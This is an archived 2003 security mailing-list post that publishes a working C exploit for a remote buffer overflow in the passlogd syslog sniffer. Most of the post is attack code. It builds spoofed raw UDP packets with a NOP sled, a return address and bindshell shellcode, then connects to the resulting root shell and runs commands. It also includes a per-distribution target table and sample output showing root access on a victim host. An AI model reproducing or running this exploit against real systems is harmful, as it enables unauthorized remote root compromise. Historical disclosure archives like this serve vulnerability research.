lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030403162444.29779.qmail@hackermail.com>
From: xploit at hackermail.com (dong-h0un U)
Subject: passlogd sniffer remote buffer overflow root exploit.

Hello.

Exploit confirmed possible truth in OpenBSD.
But, I did not exploit.
Also, did not test in RedHat 8.0.

Thank you.

--

/*
**
** [*] Title: Remote Multiple Buffer Overflow vulnerability in passlogd sniffer.
** [+] Exploit code: 0x82-Remote.passlogd_sniff.xpl.c
**
** [+] Description --
**
** About:
** passlogd is a purpose-built sniffer for capturing syslog messages in transit.
** This allows for backup logging to be performed on a machine with no open ports. 
** 
** This program is introduced in securityfocus: http://www.securityfocus.com/tools/2076
** 
** Vulnerability can presume as following.
** There is sl_parse() function to 33 lines of 'parse.c' code.
** 
**     __
**         ...
**     77    while(pkt[i] != '>'){
**     78      level[j] = pkt[i]; // This is exploit target.
**     79      i++;
**     80      j++;
**     81    }
**     82    i++;
**         ...
**     --
** 
** Visual point that change flowing of this program,
** happen after overwrited stack variables.
** Of course, frame pointer overrun exists together.
** 
** [+] Vulnerable Packages --
** 
** Vendor site: http://www.morphine.com/src/passlogd.html
** 
** passlogd v0.1d
** -passlogd-0.1d.tar.gz
** +FreeBSD
** +OpenBSD
** +Linux
** +Other
** passlogd v0.1c
** -passlogd-0.1c.tar.gz
** passlogd v0.1b
** -passlogd-0.1b.tar.gz
** passlogd v0.1a
** -passlogd-0.1a.tar.gz
** 
** [+] Exploit --
** 
** Our proof of concept code was completed.
** Exhibit it sooner or later.
** 
** exploit result: --
** 
** bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2
** 
**  passlogd sniffer remote buffer overflow root exploit
**                                         by Xpl017Elz.
** 
**  [0] Set packet code size.
**  [1] Set protocol header.
**  [2] Make shellcode.
**  [3] Set rawsock.
**  [4] Send packet.
**  [5] Trying 61.37.xxx.xx:36864.
**  [*] Connected to 61.37.xxx.xx:36864.
**  [*] Executed shell successfully !
** 
** Linux blah 2.4.20 #1 SMP Fri Mar 21 20:36:58 EST 2003 i686 unknown
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
** [root@...h /passlogd-0.1d]#
**
** -- 
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@...mail.com>. 
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** This exploit is proof of concept. (Therefore, don't support 'Brute-force' mode.)
**
** P.S:
**
** I now, system OS is lacking. :-l
** Although very appreciative people sent account to me.
** uid=0 of this exploit need urgently. hehehe!
**
** Thank you.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>

struct os {
	int num;
	char *ost;
	u_long shell;
	int l_sz;
};

#define Xpl017Elz x82
#define D_M (0)
struct os plat[]=
{
	{
		0,"ALZZA Linux release 6.1 (Linux One)",
		/* It's Korean Linux */
		0xbfffaf82,545
	},
	{
		1,"WOW Linux release 6.2 (Puberty)",
		/* It's Korean Linux */
		0xbfffaf82,545
	},
	{
		2,"RedHat Linux release 7.0 (Guinness)",
		/* It's my redhat that exist uniquely. */
		0xbfffae82,581
	},
	{
		3,"WOWLiNUX Release 7.1 (Paran)",
		/* It's Korean Linux */
		0xbfffae82,593
	},
	{
		4,"RedHat Linux release 8.0 (Psyche)",
		/* It's not to me now. (C0mming s00n) */
		0x82828282,0 // shit.
	},
	{
		5,NULL,0,0
	}
};

void banrl();
int setsock(char *host,int port);
void re_connt(int sock);
void send_recv_sh(int sock);
void usage(char *p_name);
int make_sh(u_long shcode,int l_sz);
int main(int argc,char **argv)
{
	int sock,whgl,type=D_M;
	struct hostent *he;
	struct sockaddr_in hehe;
	struct iphdr *__ip_hdr_st;
	struct udphdr *__udp_hdr_st;
#ifdef _TEST
#define FK_IP "82.82.82.82" /* fake src ip */
#else
#define FK_IP "216.239.33.101" /* G00Gl3 */
#endif
	char spoof_ip[0x82]=FK_IP;
#define D_PORT (36864)
	int port=D_PORT;
#define _DMN_NAME
#ifdef _DMN_NAME
#define LC_TEST "localhost" /* default test host */
#else
#define LC_TEST "127.0.0.1" /* localhost */
#endif 
	char host[0x82]=LC_TEST;
#ifdef T_ADDR_
#define SHELL 0x82828282 /* test */
#endif
	u_long shell=plat[type].shell;
	int l_sz=plat[type].l_sz;
	int atk_pk_size,make_sh_size;
	char *__tot_atk_pk,*atk_mbuf;

	(void)banrl();
	if(argc<2)
	{
		(void)usage(argv[D_M]);
	}

	while((whgl=getopt(argc,argv,"L:l:H:h:F:f:T:t:IiS:s:"))!=-1)
	{
		extern char *optarg;
		switch(whgl)
		{
			case 'H':
			case 'h':
				memset((char *)host,D_M,sizeof(host));
				strncpy(host,optarg,sizeof(host)-1);
				break;
				
			case 'F':
			case 'f':
				memset((char *)spoof_ip,D_M,sizeof(spoof_ip));
				strncpy(spoof_ip,optarg,sizeof(spoof_ip)-1);
				break;
				
			case 'L':
			case 'l':
				l_sz=atoi(optarg);
				break;
				
			case 'T':
			case 't':
				type=atoi(optarg);
				if(type>4)
					(void)usage(argv[D_M]);
				else
				{
					shell=plat[type].shell;
					l_sz=plat[type].l_sz;
				}
				break;
				
			case 'S':
			case 's':
				shell=strtoul(optarg,NULL,NULL);
				break;
				
			case 'I':
			case 'i':
				(void)usage(argv[D_M]);
				break;
				
			case '?':
				fprintf(stderr," Try `%s -i' for more information.\n\n",argv[D_M]);
				exit(-1);
				break;
		}
	}
	{
	    	fprintf(stdout," [0] Set packet code size.\n");
		make_sh_size=strlen((char *)make_sh(shell,l_sz));
		atk_pk_size=(sizeof(struct iphdr)+
				sizeof(struct udphdr)+make_sh_size);
		__tot_atk_pk=(char *)malloc(atk_pk_size);
		memset((char *)__tot_atk_pk,D_M,atk_pk_size);
		atk_mbuf=(sizeof(struct iphdr)+
				sizeof(struct udphdr)+
				(char *)__tot_atk_pk);
		fprintf(stdout," [1] Set protocol header.\n");
		__ip_hdr_st=(struct iphdr *)__tot_atk_pk;
		__udp_hdr_st=(struct udphdr *)(sizeof(struct iphdr)+__tot_atk_pk);
		fprintf(stdout," [2] Make shellcode.\n");
		strncpy(atk_mbuf,(char *)make_sh(shell,l_sz),make_sh_size);
	}

	if((he=gethostbyname(host))==NULL)
	{
		herror(" gethostbyname()");
		exit(-1);
	}
	if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))==-1)
	{
		perror(" socket()");
		exit(-1);
	}
	if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,"1",sizeof("1"))==-1)
	{
		perror(" setsockopt()");
		exit(-1);
	}

	fprintf(stdout," [3] Set rawsock.\n");

	__ip_hdr_st->version=4;
	__ip_hdr_st->ihl=sizeof(struct iphdr)/4;
	__ip_hdr_st->tot_len=htons(atk_pk_size);
	__ip_hdr_st->ttl=0xff;
	__ip_hdr_st->protocol=IPPROTO_UDP;
	__ip_hdr_st->saddr=inet_addr(spoof_ip);
	__ip_hdr_st->daddr=inet_ntoa(*((struct in_addr *)he->h_addr));

	__udp_hdr_st->source=htons(0x82);
	__udp_hdr_st->dest=htons(0x202);
	__udp_hdr_st->len=(atk_pk_size);

	hehe.sin_family=AF_INET;
	hehe.sin_port=__udp_hdr_st->dest;
	hehe.sin_addr=*((struct in_addr *)he->h_addr);
	memset(&(hehe.sin_zero),D_M,(8));
	
	fprintf(stdout," [4] Send packet.\n");

	if((sendto(sock,__tot_atk_pk,atk_pk_size,D_M,(struct sockaddr *)&hehe,sizeof(struct sockaddr)))==-1)
	{
		perror(" sendto()");
		exit(-1);
	}

	fprintf(stdout," [5] Trying %s:%d.\n",host,port);
	sleep(2);
	sock=(int)setsock(host,port);
	(void)re_connt(sock);
	
	fprintf(stdout," [*] Connected to %s:%d.\n",host,port);
	(void)send_recv_sh(sock);
}

int make_sh(u_long shcode,int l_sz)
{
	int plus_sz_plus=D_M,pk_sz=D_M;
	char shell_code_bind_36864[]={
		/* bindshell port 36864 */
		0xeb,0x72,0x5e,0x29,0xc0,0x89,0x46,0x10,
		0x40,0x89,0xc3,0x89,0x46,0x0c,0x40,0x89,
		0x46,0x08,0x8d,0x4e,0x08,0xb0,0x66,0xcd,
		0x80,0x43,0xc6,0x46,0x10,0x10,0x66,0x89,
		0x5e,0x14,0x88,0x46,0x08,0x29,0xc0,0x89,
		0xc2,0x89,0x46,0x18,0xb0,0x90,0x66,0x89,
		0x46,0x16,0x8d,0x4e,0x14,0x89,0x4e,0x0c,
		0x8d,0x4e,0x08,0xb0,0x66,0xcd,0x80,0x89,
		0x5e,0x0c,0x43,0x43,0xb0,0x66,0xcd,0x80,
		0x89,0x56,0x0c,0x89,0x56,0x10,0xb0,0x66,
		0x43,0xcd,0x80,0x86,0xc3,0xb0,0x3f,0x29,
		0xc9,0xcd,0x80,0xb0,0x3f,0x41,0xcd,0x80,
		0xb0,0x3f,0x41,0xcd,0x80,0x88,0x56,0x07,
		0x89,0x76,0x0c,0x87,0xf3,0x8d,0x4b,0x0c,
		0xb0,0x0b,0xcd,0x80,0xe8,0x89,0xff,0xff,
		0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
	};
	char sh_data_align_4[0x400];
#define NULL_NULL_PSH 0x00
	memset((char *)sh_data_align_4,NULL_NULL_PSH,sizeof(sh_data_align_4));
#define NOP_NOP_PSH 0x90
	for(pk_sz=D_M;pk_sz<l_sz;pk_sz++)
		sh_data_align_4[pk_sz]=NOP_NOP_PSH;
	{
		sh_data_align_4[pk_sz++]=(shcode>>0)&0xff;
		sh_data_align_4[pk_sz++]=(shcode>>8)&0xff;
		sh_data_align_4[pk_sz++]=(shcode>>16)&0xff;
		sh_data_align_4[pk_sz++]=(shcode>>24)&0xff;
		sh_data_align_4[pk_sz++]=(0x3e);
	}
	for(plus_sz_plus=D_M;
		plus_sz_plus<sizeof(sh_data_align_4)-
		strlen(sh_data_align_4)-
		strlen(shell_code_bind_36864);
		plus_sz_plus++)
		sh_data_align_4[pk_sz++]=NOP_NOP_PSH;
	for(plus_sz_plus=D_M;
		plus_sz_plus<strlen(shell_code_bind_36864);
		plus_sz_plus++)
		sh_data_align_4[pk_sz++]=shell_code_bind_36864[plus_sz_plus];
	return strdup(sh_data_align_4);
}

int setsock(char *hostip,int port)
{
	int sock;
	struct hostent *he;
	struct sockaddr_in x82;
	
	if((he=gethostbyname(hostip))==NULL)
	{
		return(-1);
	}
	if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
	{
		return(-1);
	}
	x82.sin_family=AF_INET;
	x82.sin_port=htons(port);
	x82.sin_addr=*((struct in_addr *)he->h_addr);
	memset(&(x82.sin_zero),0,8);

	if(connect(sock,(struct sockaddr *)&x82,sizeof(struct sockaddr))==-1)
	{
		return(-1);
	}
	return(sock);
}

void re_connt(int sock)
{
	if(sock==-1)
	{
		fprintf(stderr," [-] Connect Failed.\n\n");
		exit(-1);
	}
}

void send_recv_sh(int sock)
{
	int pk;
	struct timeval tm;
	char *t_cmd="uname -a;id;exec bash -i\n";
	char rbuf[1024];
	fd_set rset;
	memset((char *)rbuf,D_M,sizeof(rbuf));
	fprintf(stdout," [*] Executed shell successfully !\n\n");
	send(sock,t_cmd,strlen(t_cmd),D_M);

	tm.tv_sec=10;
	tm.tv_usec=D_M;
	
	while(1)
	{
		fflush(stdout);
		FD_ZERO(&rset);
		FD_SET(sock,&rset);
		FD_SET(STDIN_FILENO,&rset);

		select(sock+1,&rset,NULL,NULL,&tm);

		if(FD_ISSET(sock,&rset))
		{
			pk=read(sock,rbuf,sizeof(rbuf)-1);
			if(pk<=D_M)
			{
				fprintf(stdout," [*] Happy-Exploit\n\n");
				exit(D_M);
			}
			rbuf[pk]=D_M;
			fprintf(stdout,"%s",rbuf);
		}
		if(FD_ISSET(STDIN_FILENO,&rset))
		{
			pk=read(STDIN_FILENO,rbuf,sizeof(rbuf)-1);
			if(pk>D_M)
			{
				rbuf[pk]=D_M;
				write(sock,rbuf,pk);
			}
		}
	}
	return;
}

void usage(char *p_name)
{
	int r_s=D_M;
	fprintf(stdout," Usage: %s -option [argument]\n",p_name);
	fprintf(stdout,"\n\t-h - hostname.\n");
	fprintf(stdout,"\t-f - spoof src ip.\n");
	fprintf(stdout,"\t-s - &shellcode.\n");
	fprintf(stdout,"\t-l - buf len.\n");
	fprintf(stdout,"\t-t - target number.\n");
	fprintf(stdout,"\t-i - help information.\n\n");
	fprintf(stdout," Select target number:\n\n");

	for(;;)
	{
		if(plat[r_s].ost==NULL)
			break;
		else fprintf(stdout,"\t{%d} %s\n",plat[r_s].num,plat[r_s].ost);
		r_s++;
	}
	fprintf(stdout,"\n Example> %s -h localhost -f82.82.82.82 -t3",p_name);
	fprintf(stdout,"\n Example2> %s -h localhost -s0x82828282 -l582\n\n",p_name);
	exit(-1);
}

void banrl()
{
	fprintf(stdout,"\n passlogd sniffer remote buffer overflow root exploit\n");
	fprintf(stdout,"                                        by Xpl017Elz.\n\n");
}

/* eox */

--


-- 
_______________________________________________
Get your free email from http://www.hackermail.com

Powered by Outblaze

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ